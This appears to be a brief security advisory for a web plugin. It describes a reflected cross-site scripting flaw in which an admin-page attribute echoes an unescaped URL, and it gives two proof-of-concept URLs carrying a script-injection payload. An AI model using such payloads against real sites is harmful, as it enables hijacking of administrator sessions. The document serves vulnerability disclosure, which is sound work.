The plugin does not escape a generated URL before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting
https://example.com/all-ads/?"><script>alert(/XSS/)</script>
https://example.com/all-properties/?"><script>alert(/XSS/)</script>